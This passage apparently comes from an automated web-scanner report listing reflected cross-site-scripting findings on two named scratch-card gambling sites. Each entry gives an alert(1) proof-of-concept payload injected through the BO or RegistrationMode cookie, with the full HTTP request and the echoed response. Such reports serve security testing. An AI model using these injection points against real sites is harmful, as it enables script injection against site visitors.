3.397. http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Sitemap.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c088a"-alert(1)-"70c96cb89d5 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PMc088a"-alert(1)-"70c96cb89d5; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc088a"-alert(1)-"70c96cb89d5; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:40 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc088a"-alert(1)-"70c96cb89d5";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.398. http://www.scratch2cash.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d468"-alert(1)-"461686b0f2a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM2d468"-alert(1)-"461686b0f2a; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FM2d468"-alert(1)-"461686b0f2a; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2d468"-alert(1)-"461686b0f2a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.399. http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffd5"-alert(1)-"2e2cefb717e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM2ffd5"-alert(1)-"2e2cefb717e; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2ffd5"-alert(1)-"2e2cefb717e; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2ffd5"-alert(1)-"2e2cefb717e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.400. http://www.scratch2cash.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e0d"-alert(1)-"52b3aba56ef was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM68e0d"-alert(1)-"52b3aba56ef; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: BO=FM68e0d"-alert(1)-"52b3aba56ef; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:41 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM68e0d"-alert(1)-"52b3aba56ef";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.401. http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 526d6"-alert(1)-"aab7963d8e1 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM526d6"-alert(1)-"aab7963d8e1; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM526d6"-alert(1)-"aab7963d8e1; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM526d6"-alert(1)-"aab7963d8e1";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.402. http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff42d"-alert(1)-"1bbf6ee4b12 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMff42d"-alert(1)-"1bbf6ee4b12; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: BO=FMff42d"-alert(1)-"1bbf6ee4b12; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMff42d"-alert(1)-"1bbf6ee4b12";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.403. http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a85"-alert(1)-"f7f57431a77 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMc5a85"-alert(1)-"f7f57431a77; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc5a85"-alert(1)-"f7f57431a77; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:02 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc5a85"-alert(1)-"f7f57431a77";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.404. http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351d1"-alert(1)-"d2667488539 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM351d1"-alert(1)-"d2667488539; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: BO=FM351d1"-alert(1)-"d2667488539; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM351d1"-alert(1)-"d2667488539";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.405. http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ac4"-alert(1)-"7b1c85d8d98 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf7ac4"-alert(1)-"7b1c85d8d98; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf7ac4"-alert(1)-"7b1c85d8d98; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:52 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf7ac4"-alert(1)-"7b1c85d8d98";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.406. http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 675ff"-alert(1)-"e8312342e57 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM675ff"-alert(1)-"e8312342e57; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: BO=FM675ff"-alert(1)-"e8312342e57; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:11 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46188

